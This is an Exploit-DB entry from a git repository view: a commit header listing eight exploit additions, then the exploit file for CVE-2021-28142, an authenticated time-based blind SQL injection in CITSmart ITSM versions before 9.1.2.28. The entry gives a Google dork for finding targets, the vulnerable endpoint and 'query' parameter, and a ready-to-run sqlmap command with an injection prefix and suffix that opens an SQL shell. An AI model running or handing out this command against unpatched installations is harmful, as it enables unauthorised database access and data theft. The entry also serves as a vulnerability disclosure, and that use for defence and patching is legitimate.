bccca11e26
8 changes to exploits/shellcodes MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution Digital Crime Report Management System 1.0 - SQL Injection (Authentication Bypass) CITSmart ITSM 9.1.2.22 - LDAP Injection CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated) Genexis PLATINUM 4410 2.1 P4410-V2-1.28 - RCE jQuery 1.2 - Cross-Site Scripting (XSS) jQuery 1.0.3 - Cross-Site Scripting (XSS)
21 lines
No EOL
1 KiB
Text
21 lines
No EOL
1 KiB
Text
# Exploit Title: CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated)
|
|
# Google Dork: "citsmart.local"
|
|
# Date: 11/03/2021
|
|
# Exploit Author: skysbsb
|
|
# Vendor Homepage: https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html
|
|
# Version: < 9.1.2.28
|
|
# CVE : CVE-2021-28142
|
|
|
|
To exploit this flaw it is necessary to be authenticated.
|
|
|
|
URL vulnerable:
|
|
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale
|
|
Param vulnerable: query
|
|
|
|
Sqlmap usage: sqlmap -u "
|
|
https://vulnsite.com/citsmart/pages/smartPortal/pages/autoCompletePortal/autoCompletePortal.load?idPortfolio=&idServico=&query=fale" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell
|
|
|
|
Affected versions: < 9.1.2.28
|
|
Fixed versions: >= 9.1.2.28
|
|
|
|
Vendor has acknowledge this vulnerability at ticket 11216 (https://docs.citsmart.com/pt-br/citsmart-platform-9/get-started/about-citsmart/release-notes.html) |